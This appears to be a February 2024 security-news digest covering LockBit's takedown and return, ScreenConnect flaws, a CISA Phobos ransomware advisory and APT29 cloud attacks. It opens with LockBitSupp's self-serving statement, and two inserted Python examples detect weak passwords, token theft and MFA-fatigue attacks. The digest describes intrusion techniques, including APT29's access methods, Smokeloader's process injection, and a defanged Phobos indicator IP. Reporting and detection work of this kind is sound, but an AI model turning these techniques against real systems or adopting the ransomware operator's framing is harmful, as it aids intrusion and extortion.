Autosummary: *when I write the word FBI I mean not only FBI, but also all their assistants, who know how to arrest servers of partners, which act as the first lining after stealing data from the attacked company and do not represent any value: South West Regional Organized Crime Unit in the U.K., Metropolitan Police Service in the U.K., Europol, Gendarmerie-C3N in France, the State Criminal Police Office L-K-A and Federal Criminal Police Office in Germany, Fedpol and Zurich Cantonal Police in Switzerland, the National Police Agency in Japan, the Australian Federal Police in Australia, the Swedish Police Authority in Sweden, the National Bureau of Investigation in Finland, the Royal Canadian Mounted Police in Canada, and the National Police in the Netherlands. A couple of my partners were arrested, to be honest I doubt that very much, they are probably just people who are laundering cryptocurrencies, maybe they were working for some mixers and exchangers with drops, that's why they were arrested and considered my partners, it would be interesting to see the video of the arrest, where at their homes, Lamborghinis and laptops with evidence of their involvement in our activities, but I somehow think we will not see it, because the FBI arrested random people to get a certificate of merit from the management, say look there are arrests, we are not getting money for nothing, we are honestly working off taxes and imprisoning random people, when real pentesters quietly continue their work. The FBI says they received about 1000 decryptors, a nice figure, but it doesn't look like the truth, yes they received some unprotected decryptors, those builds of the locker that were made without the "maximum decryptor protection" checkbox could only be received by the FBI in the last 30 days, it's not known on what day the FBI got access to the server, but we know exactly the date of CVE disclosure and the date when PHP generated an error, before Feb 19th the attacked companies were regularly paying even for unprotected decryptors, so there is a chance the FBI were only on the server for 1 day, it would be nice if the FBI released all the decryptors to the public, then you could trust them that they really own the decryptors, not bluffing and praising their superiority, not the superiority of 1 smart pentester with a public CVE. The FBI designer should work for me, you have good taste, I especially liked the new preloader, in the new update I should do something similar, USA, UK and Europe revolve around my logo, brilliant idea, right there made me feel very good, thanks. Even if you updated your PHP version after reading this information, it will not be enough, because you have to change the hoster, server, all possible passwords, user passwords in the database, audit the source code and migrate everything, there is no guarantee that you have not been hardened on the server. As a result of hacking the servers, the FBI obtained a database, web panel sources, locker stubs that are not source as they claim and a small portion of unprotected decryptors, they claim 1000 decryptors, although there were almost 20000 decryptors on the server, most of which were protected and cannot be used by the FBI. "


          LockBit Ransomware Group Resurfaces After Law Enforcement Takedown

          exploits ransomware
          2024-02-26 https://thehackernews.com/2024/02/lockbit-ransomware-group-resurfaces.html
The threat actors behind the LockBit ransomware operation have resurfaced on the dark web using new infrastructure, days after an international law enforcement exercise seized control of its servers. To that end, the notorious group has moved its data leak portal to a new .onion address on the TOR network, listing 12 new victims as of writing. The administrator behind LockBit, in a […] "

          Autosummary: "The attackers worked under the guise of a legitimate IT firm Shtazi-IT, which offers services for the development of landing pages, mobile applications, scripts, parsers, and online stores," Russian cybersecurity firm F.A.C.C.T. said. The stolen information included names, dates of birth, Medicare numbers, and sensitive medical information, including records on mental health, sexual health, and drug use. "


          ScreenConnect flaws exploited to deliver all kinds of malware (CVE-2024-1709, CVE-2024-1708)

          exploits
          2024-02-26 https://www.helpnetsecurity.com/2024/02/26/cve-2024-1709-exploited/

          The recently patched vulnerabilities (CVE-2024-1709, CVE-2024-1708) in ConnectWise ScreenConnect software are being exploited by numerous attackers to deliver a variety of malicious payloads. About ConnectWise ScreenConnect ConnectWise ScreenConnect is a remote desktop solution consisting of server and client elements (applications). The server element is offered as-a-service by ConnectWise or can be installed by customers on their own servers, either on-premises or in the cloud. Client software is installed on workstations and other endpoints, where and … More


          Autosummary: Sophos’ X-Ops task force says that they spotted attackers deliver two different ransomware variants (both generated by the previously leaked LockBit builder), as well as infostealers, RATs, worms, Cobalt Strike payloads, and additional remote access clients (SimpleHelp, Google Chrome Remote Desktop). "


          Banking Trojans Target Latin America and Europe Through Google Cloud Run

          financial exploits
          2024-02-26 https://thehackernews.com/2024/02/banking-trojans-target-latin-america.html
          Cybersecurity researchers are warning about a spike in email phishing campaigns that are weaponizing the Google Cloud Run service to deliver various banking trojans such as Astaroth (aka Guildma), Mekotio, and Ousaban (aka Javali) to targets across Latin America (LATAM) and Europe. "The infection chains associated with these malware families feature the use of malicious "

          Autosummary: A majority of the systems used to send phishing messages originate from Brazil, followed by the U.S., Russia, Mexico, Argentina, Ecuador, South Africa, France, Spain, and Bangladesh. "


          Cybersecurity Training Not Sticking? How to Fix Risky Password Habits

          ciber
          2024-02-26 https://www.bleepingcomputer.com/news/security/cybersecurity-training-not-sticking-how-to-fix-risky-password-habits/
While security training can help create a culture of cybersecurity awareness, it can't be relied upon to consistently change behavior. Learn more from Specops Software about the limitations of training and five ways you can increase password security. [...] "

Autosummary: Reinforce training with powerful password security Specops Password Policy with Breached Password Protection blocks weak passwords from being created and continuously scans your Active Directory passwords against a database of over four billion known compromised passwords. Enforce multi-factor authentication (MFA): MFA adds an extra layer of security by requiring users to provide additional verification, such as a fingerprint scan or a one-time password, in addition to their password. Block weak passwords: Setting up an effective password policy can block common passwords, keyboard walks, and even custom dictionaries specific to your organization's industry. "
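The checks the summary above describes (common-password blocking, keyboard-walk detection, an organisation-specific dictionary, and a lookup against a breached-password corpus) are straightforward to express as a single policy function. The block below is an added example written for this page, not Specops code and not a description of how Specops Password Policy works internally. The breach corpus, common-password list, organisation dictionary, minimum length and leetspeak map are all constructed stand-ins; the corpus is stored as SHA-1 prefix ranges so the lookup has the same shape as a k-anonymity range query, which is how a client can check a password without sending it off-box.

```python
import hashlib

# Added example for this page, not Specops code. All data below is
# constructed for illustration and stands in for real corpora.

# Breach corpus stored the way a k-anonymity range lookup returns it:
# uppercase SHA-1, split into a 5-hex-char prefix and a 35-char suffix.
_CONSTRUCTED_BREACHED = ["password", "Welcome1", "Summer2024!"]
BREACHED_RANGES: dict[str, set[str]] = {}
for _pw in _CONSTRUCTED_BREACHED:
    _h = hashlib.sha1(_pw.encode("utf-8")).hexdigest().upper()
    BREACHED_RANGES.setdefault(_h[:5], set()).add(_h[5:])

COMMON_PASSWORDS = {"password", "qwerty", "letmein", "welcome"}
ORG_DICTIONARY = {"acme", "widgetco"}          # hypothetical organisation terms
KEYBOARD_ROWS = ["qwertyuiop", "asdfghjkl", "zxcvbnm", "1234567890"]
MIN_LENGTH = 12                                # assumed policy minimum

# Undo common leetspeak before dictionary comparison so "P@ssw0rd" is
# judged as "password".
_LEET = str.maketrans("@0143$5", "aoiaess")


def normalize(password: str) -> str:
    return password.lower().translate(_LEET)


def is_breached(password: str) -> bool:
    """Look the password up by hash prefix, as a range query would."""
    digest = hashlib.sha1(password.encode("utf-8")).hexdigest().upper()
    return digest[5:] in BREACHED_RANGES.get(digest[:5], set())


def has_keyboard_walk(password: str, length: int = 4) -> bool:
    """True if any run of `length` adjacent keys, in either direction, appears."""
    text = password.lower()
    for row in KEYBOARD_ROWS:
        for i in range(len(row) - length + 1):
            segment = row[i:i + length]
            if segment in text or segment[::-1] in text:
                return True
    return False


def check_password(password: str) -> list[str]:
    """Return the list of policy violations; an empty list means accepted."""
    problems = []
    if len(password) < MIN_LENGTH:
        problems.append("too short")
    base = normalize(password)
    if base in COMMON_PASSWORDS:
        problems.append("common password")
    for word in sorted(ORG_DICTIONARY):
        if word in base:
            problems.append(f"contains organisation word '{word}'")
    if has_keyboard_walk(password):
        problems.append("keyboard walk")
    if is_breached(password):
        problems.append("found in breach corpus")
    return problems


if __name__ == "__main__":
    for candidate in ["password", "Acme-Qwerty-2024!", "correct horse battery staple 7"]:
        print(f"{candidate!r}: {check_password(candidate) or 'accepted'}")
```

The breach check hashes the candidate and compares only the suffix inside the matching prefix bucket, so the full hash never has to leave the host even when the bucket is fetched from a remote range service; the organisation dictionary is matched against the normalised form so trivial substitutions do not slip past it.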


          The LockBit ransomware gang rears its ugly head again, after law enforcement takedown

          exploits ransomware
          2024-02-26 https://www.bitdefender.com/blog/hotforsecurity/the-lockbit-ransomware-gang-rears-its-ugly-head-again-after-law-enforcement-takedown/
          Surprise! The LockBit ransomware group has re-emerged, just days after a high-profile law enforcement operation seized control of its infrastructure and disrupted its operations. Read more in my article on the Hot for Security blog. "

Autosummary: LockBit's secretive administrator, who uses the online handle "LockBitSupp", acknowledged that the group's infrastructure was likely compromised by computer crime-fighting authorities due to their failure to patch their PHP version because of "personal negligence and irresponsibility." "


          NetSTAR PhishCompass combats phishing threats

          financial
          2024-02-26 https://www.helpnetsecurity.com/2024/02/26/netstar-phishcompass/

          NetSTAR announced an advancement in phish detection technology with the introduction of PhishCompass. This innovative AI-supported solution marks a significant milestone in the ongoing battle against phishing threats and attacks, tailored for a wide range of industry sectors including security, networking, cloud services, service providers, and mobile operations. PhishCompass: A real-time phish detection PhishCompass integrates three advanced AI detectors to scrutinize domain strings, HTML content and visual elements, assessing the phishing threat potential of websites. … More


          Autosummary: This innovative AI-supported solution marks a significant milestone in the ongoing battle against phishing threats and attacks, tailored for a wide range of industry sectors including security, networking, cloud services, service providers, and mobile operations. "


          LockBit leak site is back online

          ransomware
          2024-02-26 https://www.helpnetsecurity.com/2024/02/26/lockbit-leak-site-is-back-online/

          LockBitSupp, the individual running the LockBit ransomware-as-a-service operation, has made good on one promise: the LockBit leak site is back online on backup domains, with lists of victims expected to be unveiled in the coming days. Law enforcement strikes LockBit RaaS gang Last week, Operation Cronos hit LockBit hard by taking over their leak site and affiliate panel, disrupting part of their infrastructure, and arresting some suspected affiliates. It followed up by teasing a reveal … More




          DataVisor introduces fraud and risk solution for financial institutions

          financial
          2024-02-26 https://www.helpnetsecurity.com/2024/02/26/datavisor-fraud-solution/

          DataVisor launched a solution designed to both detect fraud and financial crimes more effectively and to uphold sponsor bank compliance in the face of evolving regulations for Banking-as-a-Service (BaaS) offerings. As the fintech industry continues to rapidly evolve amidst a rising tide of fraud, sponsor banks not only grapple with the growing issues of increased fraud losses, but also face enormous challenges in maintaining and demonstrating compliance. DataVisor’s solution for sponsor banks replaces ad-hoc detection … More


          Autosummary: DataVisor’s solution for sponsor banks replaces ad-hoc detection and compliance methods with comprehensive future-proof technology, including real-time data orchestration, secure multi-tenant infrastructure, and AI-driven analytics. "


          Hackers exploit 14-year-old CMS editor on govt, edu sites for SEO poisoning

          exploits
          2024-02-26 https://www.bleepingcomputer.com/news/security/hackers-exploit-14-year-old-cms-editor-on-govt-edu-sites-for-seo-poisoning/
          Threat actors are exploiting a CMS editor discontinued 14 years ago to compromise education and government entities worldwide to poison search results with malicious sites or scams. [...] "

          Autosummary: In a Twitter thread, g0njxa lists the various organizations targeted by this campaign, primarily targeting educational institutions, such as MIT, Columbia University, Universitat de Barcelona, Auburn University, University of Washington, Purdue, Tulane, Universidad Central del Ecuador, and the University of Hawaiʻi. "


          Russian hackers shift to cloud attacks, US and allies warn

          rusia-ucrania
          2024-02-26 https://www.bleepingcomputer.com/news/security/russian-hackers-shift-to-cloud-attacks-us-and-allies-warn/
Members of the Five Eyes (FVEY) intelligence alliance warned today that APT29 Russian Foreign Intelligence Service (SVR) hackers are now switching to attacks targeting their victims' cloud services. [...] "

Autosummary: APT29's initial cloud breach vectors also include the use of stolen access tokens that enable them to hijack accounts without using credentials, compromised residential routers to proxy their malicious activity, MFA fatigue to bypass multi-factor authentication (MFA), and registering their own devices as new devices on the victims' cloud tenants. After gaining initial access, SVR hackers use sophisticated tools like the MagicWeb malware (which allows them to authenticate as any user within a compromised network) to evade detection in the victims' networks, mainly government and critical organizations spanning Europe, the United States, and Asia. "
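Three of the initial-access vectors listed above (stolen access tokens, MFA fatigue, and attacker-controlled device registration) each leave a recognisable pattern in identity-provider sign-in logs. The block below is an added example for this page, not part of the advisory and not vendor detection content; the JSON event format, field names, thresholds and windows are assumptions, and the sample events are constructed so that each detection fires exactly once while a benign device registration from a long-established address does not.

```python
import json
from collections import defaultdict
from datetime import datetime, timedelta

# Added example, not from the advisory. Event schema and field names are
# assumptions loosely modelled on identity-provider sign-in logs; the
# events are constructed (RFC 5737 test addresses, fictional users).
SAMPLE_LOG = """
{"ts": "2024-02-26T08:00:05Z", "user": "alice", "event": "mfa_prompt", "result": "denied", "ip": "203.0.113.7", "session": "s1"}
{"ts": "2024-02-26T08:01:10Z", "user": "alice", "event": "mfa_prompt", "result": "denied", "ip": "203.0.113.7", "session": "s1"}
{"ts": "2024-02-26T08:02:30Z", "user": "alice", "event": "mfa_prompt", "result": "timeout", "ip": "203.0.113.7", "session": "s1"}
{"ts": "2024-02-26T08:03:40Z", "user": "alice", "event": "mfa_prompt", "result": "approved", "ip": "203.0.113.7", "session": "s1"}
{"ts": "2024-02-26T08:04:00Z", "user": "alice", "event": "signin", "result": "success", "ip": "203.0.113.7", "session": "s1"}
{"ts": "2024-02-26T08:05:00Z", "user": "alice", "event": "device_registered", "result": "success", "ip": "203.0.113.7", "session": "s1"}
{"ts": "2024-02-26T09:00:00Z", "user": "bob", "event": "signin", "result": "success", "ip": "198.51.100.20", "session": "s2"}
{"ts": "2024-02-26T09:10:00Z", "user": "bob", "event": "signin", "result": "success", "ip": "192.0.2.99", "session": "s2"}
{"ts": "2024-02-20T10:00:00Z", "user": "carol", "event": "signin", "result": "success", "ip": "198.51.100.5", "session": "s3"}
{"ts": "2024-02-26T10:02:00Z", "user": "carol", "event": "mfa_prompt", "result": "approved", "ip": "198.51.100.5", "session": "s4"}
{"ts": "2024-02-26T10:03:00Z", "user": "carol", "event": "device_registered", "result": "success", "ip": "198.51.100.5", "session": "s4"}
"""


def _ts(event: dict) -> datetime:
    return datetime.fromisoformat(event["ts"].replace("Z", "+00:00"))


def parse_events(text: str) -> list[dict]:
    events = [json.loads(line) for line in text.strip().splitlines() if line.strip()]
    return sorted(events, key=_ts)


def detect_mfa_fatigue(events, threshold=3, window=timedelta(minutes=10)):
    """Burst of denied/timed-out prompts followed by an approval: push bombing."""
    alerts = []
    pending = defaultdict(list)            # user -> timestamps of recent failed prompts
    for e in events:
        if e["event"] != "mfa_prompt":
            continue
        t = _ts(e)
        recent = [f for f in pending[e["user"]] if t - f <= window]
        if e["result"] in ("denied", "timeout"):
            recent.append(t)
        elif e["result"] == "approved" and len(recent) >= threshold:
            alerts.append((e["user"], len(recent)))
            recent = []
        pending[e["user"]] = recent
    return alerts


def detect_session_reuse(events):
    """One session/token value used from more than one source IP: token theft."""
    ips = defaultdict(set)
    for e in events:
        ips[(e["user"], e["session"])].add(e["ip"])
    return [(u, s, sorted(v)) for (u, s), v in ips.items() if len(v) > 1]


def detect_new_device_from_new_ip(events, window=timedelta(hours=1)):
    """Device registration from an address the user first appeared on < window ago."""
    first_seen = {}
    alerts = []
    for e in events:
        first = first_seen.setdefault((e["user"], e["ip"]), _ts(e))
        if e["event"] == "device_registered" and _ts(e) - first <= window:
            alerts.append((e["user"], e["ip"]))
    return alerts


def run_all(text: str) -> dict:
    events = parse_events(text)
    return {
        "mfa_fatigue": detect_mfa_fatigue(events),
        "session_reuse": detect_session_reuse(events),
        "new_device": detect_new_device_from_new_ip(events),
    }


if __name__ == "__main__":
    for name, hits in run_all(SAMPLE_LOG).items():
        print(f"{name}: {hits}")
```

Carol's registration does not alert because her address was first seen days earlier, which is the distinction that keeps the device-registration rule from paging on every new laptop; in production the session-reuse rule should also tolerate legitimate IP changes (mobile carriers, VPN reconnects) by comparing ASN or geolocation rather than raw addresses.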


          Steel giant ThyssenKrupp confirms cyberattack on automotive division

          industry ciber
          2024-02-26 https://www.bleepingcomputer.com/news/security/steel-giant-thyssenkrupp-confirms-cyberattack-on-automotive-division/
          Steel giant ThyssenKrupp confirms that hackers breached systems in its Automotive division last week, forcing them to shut down IT systems as part of its response and containment effort. [...] "



          Booking.com refund request? It might be an Agent Tesla malware attack

          exploits
          2024-02-26 https://grahamcluley.com/booking-com-refund-request-it-might-be-an-agent-tesla-malware-attack/
Always be wary of opening unsolicited attachments - they might harbour malware. That's a message that is being strongly underlined once again, following the discovery of a cybercrime campaign that is sending out poisoned PDF files - pretending they are associated with hotel reservations. "



          A cyber attack hit Thyssenkrupp Automotive Body Solutions business unit

          industry
          2024-02-26 https://securityaffairs.com/159611/hacking/thyssenkrupp-automotive-body-solutions-bu-cyberattack.html
          Steel giant ThyssenKrupp disclosed a security breach that impacted its Automotive division last week; in response to the attack, the company shut down IT systems. The news of the attack was reported by the […]

          Autosummary: By Pierluigi Paganini, February 26, 2024. ThyssenKrupp disclosed a security breach that impacted its automotive division last week; in response to the attack, the company shut down IT systems.


          #StopRansomware: Phobos Ransomware

          exploits ransomware
          2024-02-26 https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-060a

          SUMMARY

          Note: This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.

          The Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) are releasing this joint CSA, to disseminate known TTPs and IOCs associated with the Phobos ransomware variants observed as recently as February 2024, according to open source reporting. Phobos is structured as a ransomware-as-a-service (RaaS) model. Since May 2019, Phobos ransomware incidents impacting state, local, tribal, and territorial (SLTT) governments have been regularly reported to the MS-ISAC. These incidents targeted municipal and county governments, emergency services, education, public healthcare, and other critical infrastructure entities to successfully ransom several million U.S. dollars.[1],[2]

          The FBI, CISA, and the MS-ISAC encourage organizations to implement the recommendations in the Mitigations section of this CSA to reduce the likelihood and impact of Phobos ransomware and other ransomware incidents.


          Autosummary:

          Overview: According to open source reporting, Phobos ransomware is likely connected to numerous variants (including Elking, Eight, Devos, Backmydata, and Faust ransomware) due to similar TTPs observed in Phobos intrusions. These tools are all widely accessible and easy to use in various operating environments, making it (and associated variants) a popular choice for many threat actors.[3],[4]

          Reconnaissance and Initial Access: Phobos actors typically gain initial access to vulnerable networks by leveraging phishing campaigns [T1598] to drop hidden payloads or using internet protocol (IP) scanning tools, such as Angry IP Scanner, to search for vulnerable Remote Desktop Protocol (RDP) ports [T1595.001] or by leveraging RDP on Microsoft Windows. Threat actors leveraging Phobos have notably deployed remote access tools to establish a remote connection within the compromised network [T1219].[7] Alternatively, threat actors send spoofed email attachments [T1566.001] that are embedded with hidden payloads [T1204.002] such as SmokeLoader, a backdoor trojan that is often used in conjunction with Phobos. See Figure 2 for a list of email providers used by the following Phobos affiliates: Devos, Eight, Elbie, Eking, and Faust.[6]

          [Figure 1: Phobos Affiliate Providers List]

          Execution: The Windows command shell enables threat actors to control various aspects of a system, with multiple permission levels required for different subsets of commands [T1059.003][T1105].[8]

          Smokeloader Deployment: Phobos operations feature a standard three phase process to decrypt a payload that allows the threat actors to deploy additional destructive malware.[9] For the first phase, Smokeloader manipulates either VirtualAlloc or VirtualProtect API functions—which opens an entry point, enabling code to be injected into running processes and allowing the malware to evade network defense tools [T1055.002]. Finally, once Smokeloader reaches its third stage, it unpacks a program-erase cycle from stored memory, which is then sent to be extracted from a SHA 256 hash as a payload.[7] Following successful payload decryption, the threat actors can begin downloading additional malware.

          INDICATORS OF COMPROMISE (IOCs): See Table 1 through 6 for IOCs obtained from CISA and the FBI investigations from September through November 2023.

          MITIGATIONS: In addition, the authoring authorities of this CSA recommend network defenders apply the following mitigations to limit potential adversarial use of common system and network discovery techniques, and to reduce the impact and risk of compromise by ransomware or data extortion actors: Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, and secure location (i.e., hard drive, storage device, or the cloud).

          VALIDATE SECURITY CONTROLS: In addition to applying mitigations, the FBI, CISA, and MS-ISAC recommend exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. The FBI, CISA, and MS-ISAC recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.

          REPORTING: The FBI is seeking any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom-note, communications with Phobos actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file. Additional details requested include: a targeted company point of contact, status and scope of infection, estimated loss, operational impact, transaction IDs, date of infection, date detected, initial attack vector, and host and network-based indicators.

          Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise does not constitute or imply endorsement, recommendation, or favoring by CISA, the FBI, and the MS-ISAC.

          RESOURCES / REFERENCES
          [1] Privacy Affairs: “Moral” 8Base Ransomware Targets 2 New Victims
          [2] VMware: 8base ransomware: A Heavy Hitting Player
          [3] Infosecurity Magazine: Phobos Ransomware Family Expands With New FAUST Variant
          [4] The Record: Hospitals offline across Romania following ransomware attack on IT platform
          [6] Cisco Talos: Understanding the Phobos affiliate structure and activity
          [7] Cisco Talos: A deep dive into Phobos ransomware, recently deployed by 8Base group
          [8] Malwarebytes Labs: A deep dive into Phobos ransomware
          [9] Any Run: Smokeloader
          [10] Malpedia: Smokeloader
          [11] A case of the FAUST Ransomware
          [12] VirusTotal: Phobos Domain #1
          [13] VirusTotal: Phobos executable: Ahpdate.exe
          [14] VirusTotal: Phobos GUI extension: ELF File
          [15] VirusTotal: Phobos IP address: 185.202.0[.]111
          [16] VirusTotal: Phobos GUI extension: Binary File
          [17] Cisco Talos GitHub: IOCs/2023/11/deep-dive-into-phobos-ransomware.txt at main


          Week in review: 10 cybersecurity startups to watch, admins urged to remove VMware vSphere plugin

          ciber
          2024-02-25 https://www.helpnetsecurity.com/2024/02/25/week-in-review-10-cybersecurity-startups-to-watch-admins-urged-to-remove-vmware-vsphere-plugin/

          Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Inside the strategy of Salesforce’s new Chief Trust Officer In this Help Net Security interview, Arkin discusses a collaborative approach to building trust among customers, employees, and stakeholders, focusing on transparency, shared responsibility, and empowering others to integrate trusted and responsible technologies. How decentralized identity is shaping the future of data protection In this Help Net Security interview, Patrick Harding, … More

          The post Week in review: 10 cybersecurity startups to watch, admins urged to remove VMware vSphere plugin appeared first on Help Net Security.


          Autosummary: VMware pushes admins to uninstall vulnerable, deprecated vSphere plugin (CVE-2024-22245, CVE-2024-22250) VMware Enhanced Authentication Plug-in (EAP), a plugin for VMware vSphere, has two vulnerabilities (CVE-2024-22245, CVE-2024-22250) that could be exploited by attackers to mount authentication relay and session hijack attacks.


          Authorities Claim LockBit Admin "LockBitSupp" Has Engaged with Law Enforcement

          ransomware
          2024-02-25 https://thehackernews.com/2024/02/authorities-claim-lockbit-admin.html
          LockBitSupp, the individual(s) behind the persona representing the LockBit ransomware service on cybercrime forums such as Exploit and XSS, "has engaged with law enforcement," authorities said. The development comes following the takedown of the prolific ransomware-as-a-service (RaaS) operation as part of a coordinated international operation codenamed Cronos. Over 14,000 rogue

          Autosummary: PRODAFT, in its own analysis of the LockBit operation, said it identified over 28 affiliates, some of whom share ties with other Russian e-crime groups like Evil Corp, FIN7, and Wizard Spider (aka TrickBot). "[Initial access brokers], which were the main source of LockBit’s venture, will not trust their access to a group after a takedown, as they want their access to be turned into cash."


          Mexico poll frontrunner deluged with hate messages

          latam
          2024-02-25 https://www.bbc.co.uk/news/world-latin-america-68397627
          Claudia Sheinbaum, a close ally of President López Obrador, has had her phone number leaked online.



          LockBit ransomware returns, restores servers after police disruption

          exploits ransomware
          2024-02-25 https://www.bleepingcomputer.com/news/security/lockbit-ransomware-returns-restores-servers-after-police-disruption/
          The LockBit gang is relaunching its ransomware operation on a new infrastructure less than a week after law enforcement hacked their servers, and is threatening to focus more of their attacks on the government sector. [...]

          Autosummary: [Image: Relaunched LockBit data leak site shows five victims (source: BleepingComputer)] On February 19, authorities took down LockBit’s infrastructure, which included 34 servers hosting the data leak website and its mirrors, data stolen from the victims, cryptocurrency addresses, decryption keys, and the affiliate panel.


          Thousands attend Bolsonaro rally in Brazil

          latam
          2024-02-25 https://www.bbc.co.uk/news/world-latin-america-68399370
          Brazil’s former president greets supporters in Sao Paulo as an investigation continues into the 2023 storming of Congress.



          Russian hacker is set to face trial for the hack of a local power grid

          rusia-ucrania
          2024-02-24 https://securityaffairs.com/159536/hacking/cyber-attack-power-plant-russia-hacker.html
          A Russian national (49) was charged with a cyberattack on a local power plant that caused a widespread blackout. The news agency TASS reported that a Russian national (49) is set to face trial on charges of carrying out a cyberattack on a local power plant that left 38 villages in the Vologda region in […]



          CISA orders federal agencies to fix ConnectWise ScreenConnect bug in a week

          exploits
          2024-02-23 https://securityaffairs.com/159511/hacking/cisa-connectwise-screenconnect-known-exploited-vulnerabilities-catalog.html
          The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added a ConnectWise ScreenConnect vulnerability, tracked as CVE-2024-1709, to its Known Exploited Vulnerabilities (KEV) catalog. The vulnerability is an authentication bypass issue that an attacker with network access to the […]

          Autosummary: “Second, despite the law enforcement operation against LockBit, it seems as though some affiliates are still up and running.” According to Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities, FCEB agencies have to address the identified vulnerabilities by the due date to protect their networks against attacks exploiting the flaws in the catalog.


          Secure email gateways struggle to keep pace with sophisticated phishing campaigns

          financial
          2024-02-23 https://www.helpnetsecurity.com/2024/02/23/bypassing-segs/

          In 2023, malicious email threats bypassing secure email gateways (SEGs) increased by more than 100%, according to Cofense. In just two years, Cofense identified over 1.5 million malicious emails bypassing their customers’ SEGs, signaling a 37% increase in threats compared to 2022, and a staggering 310% increase over 2021. To put this in context, the report highlights that Cofense detected at least one malicious email bypassing their customers’ SEGs every 57 seconds. With the increasing … More

          The post Secure email gateways struggle to keep pace with sophisticated phishing campaigns appeared first on Help Net Security.


          Autosummary: “As we unveil the statistics from the 2024 Annual State of Email Security Report, it’s evident that the email-based attack vector is evolving at an unprecedented pace going into 2024,” said David Van Allen, CEO of Cofense.


          2024 will be a volatile year for cybersecurity as ransomware groups evolve

          exploits ransomware ciber
          2024-02-23 https://www.helpnetsecurity.com/2024/02/23/ransomware-groups-tactics/

          Hackers have significantly increased demands for ransomware, rising over 20% year-over-year to $600,000, according to Arctic Wolf. Organizations are failing to patch their networks. And there are worrying signs that 2024 will be especially volatile, as ransomware groups expand their list of targets, and explore new pressure tactics in response to increasingly effective international law enforcement efforts and the growing momentum of refuse-to-pay initiatives. “By helping to end cyber risk for thousands of customers around … More

          The post 2024 will be a volatile year for cybersecurity as ransomware groups evolve appeared first on Help Net Security.


          Autosummary: With an uptick in cloud services, more endpoints, unmanaged/BYO devices, and business operations transitioning from analog to digital platforms, stopping ransomware attacks with effective prevention, detection, and response becomes more challenging by the day.


          Researchers Detail Apple’s Recent Zero-Click Shortcuts Vulnerability

          exploits
          2024-02-23 https://thehackernews.com/2024/02/researchers-detail-apples-recent-zero.html
          Details have emerged about a now-patched high-severity security flaw in Apple’s Shortcuts app that could permit a shortcut to access sensitive information on the device without users’ consent. The vulnerability, tracked as CVE-2024-23204 (CVSS score: 7.5), was addressed by Apple on January 22, 2024, with the release of iOS 17.3, iPadOS 17.3, macOS Sonoma 14.3, and



          Avast ordered to pay $16.5 million for misuse of user data

          Linux
          2024-02-23 https://www.helpnetsecurity.com/2024/02/23/ftc-avast-sold-browsing-data/

          The Federal Trade Commission will require software provider Avast to pay $16.5 million and prohibit the company from selling or licensing any web browsing data for advertising purposes to settle charges that the company and its subsidiaries sold such information to third parties after promising that its products would protect consumers from online tracking. In its complaint, the FTC says that Avast, based in the United Kingdom, through its Czech subsidiary, unfairly collected consumers’ browsing … More

          The post Avast ordered to pay $16.5 million for misuse of user data appeared first on Help Net Security.


          Autosummary: For example, as alleged in the complaint, Jumpshot entered into a contract with Omnicom, an advertising conglomerate, which stated that Jumpshot would provide Omnicom with an “All Clicks Feed” for 50% of its customers in the United States, United Kingdom, Mexico, Australia, Canada, and Germany.


          Update now! ConnectWise ScreenConnect vulnerability needs your attention

          exploits
          2024-02-23 https://www.malwarebytes.com/blog/news/2024/02/update-now-connectwise-screenconnect-vulnerability-needs-your-attention
          ConnectWise customers need to take immediate action to remediate a critical vulnerability.

          Autosummary: “~3800 vulnerable ConnectWise ScreenConnect instances (authentication bypass using an alternate path or channel (CVSS 10) & path traversal (CVSS 8.4)) https://t.co/tPi9ALNVab IP data in: https://t.co/qxv0Gv5ELc ~93% instances of ScreenConnect seen on 2024-02-20 still vulnerable: https://t.co/CRpEHutjFS pic.twitter.com/hiwPqnouby” — Shadowserver (@Shadowserver), February 21, 2024. The Cybersecurity and Infrastructure Security Agency (CISA) has added the vulnerability to its Known Exploited Vulnerabilities Catalog.


          LockBitsupp unmasked!!? My reaction to the FBI and NCA’s LockBit ransomware revelation

          exploits ransomware
          2024-02-23 https://grahamcluley.com/lockbitsupp-unmasked-my-reaction-to-the-fbi-and-ncas-lockbit-ransomware-revelation/
          Check out my "live reaction" (isn’t that what all the kids post on social media these days?) to the much-hyped revelation of the identity of the LockBit ransomware’s administrator.



          Insomniac Games alerts employees hit by ransomware data breach

          financial exploits ransomware
          2024-02-23 https://www.bleepingcomputer.com/news/security/insomniac-games-alerts-employees-hit-by-ransomware-data-breach/
          Sony subsidiary Insomniac Games is sending data breach notification letters to employees whose personal information was stolen and leaked online following a Rhysida ransomware attack in November. [...]

          Autosummary: [Image: Insomniac Games leak on Rhysida’s leak site (BleepingComputer)] Now, Insomniac Games is notifying employees whose data was stolen between November 25 and November 26 and later leaked on the Rhysida ransomware group’s leak site.


          LockBit ransomware gang has over $110 million in unspent bitcoin

          exploits ransomware
          2024-02-23 https://www.bleepingcomputer.com/news/security/lockbit-ransomware-gang-has-over-110-million-in-unspent-bitcoin/
          The LockBit ransomware gang received more than $125 million in ransom payments over the past 18 months, according to the analysis of hundreds of cryptocurrency wallets associated with the operation. [...]

